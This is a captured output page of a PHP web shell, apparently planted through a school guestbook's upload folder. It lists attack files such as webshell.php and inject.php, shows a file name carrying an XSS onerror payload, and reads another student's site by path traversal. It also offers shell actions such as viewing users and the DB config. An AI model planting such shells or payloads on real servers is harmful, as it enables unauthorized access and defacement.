🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../567358.klas4s23.mid-ica.nl/public_html/l2-pro-3-gamecraft-webdevelopers/gcspel1.html

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="GameCraft.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Tillana:wght@400;500;600;700;800&display=swap"
        rel="stylesheet">
    <title>GC | Archery</title>
</head>

<body class="gameContainer" onload="loadingGame()">

    <div class="gameHeader"><img src="logo.png">
    </div>
    <div class="dropdown game">
        <button class="dropdownbutton" onclick="myFunction()"><img src="navIcon.png"
                class="buttontxt"></button>
        <div class="revealcontent" id="myDropdown">
            <a href="gchome.html">Home</a>
            <a href="gcspel1.html">Archery Spel</a>
            <a href="gcspel2.html">Penalty Shootout</a>
            <a href="gcContact.html">Contact</a>
        </div>
    </div>
    </div>
    </div>
    <div class="mainGameContent">
        <div class="Game">Archery</div>
        <div class="Handleiding">Handleiding</div>
        <div class="HandleidingContent">
            <p>Archery is een spel waar je boogschieten in het bos digitaal kunt doen! Om het spel te beginnen, druk op
                de rode en witte knop met "Play" erop. Stuur de boog in de richting die je wil door de rechterpijl- of
                linkerpijltoets (zit op je toetsenbord) ingedrukt te houden en dan loslaten. Druk op de spatiebalk om
                een pijl te schieten. Het doel van het spel is om te zien of je alle doelen neer kunt schieten met
                alleen 10 pijlen. Veel plezier!</p>
        </div>
    </div>

    <div id="mobielCanvas" style="margin-left: 40px;">Spel niet geschikt voor mobiel.</div>
    <canvas id="gameCanvas"></canvas>

    <div class="gameFooter">Copyright © 2024</div>

    <script src="gamecraft.js"></script>
</body>

</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!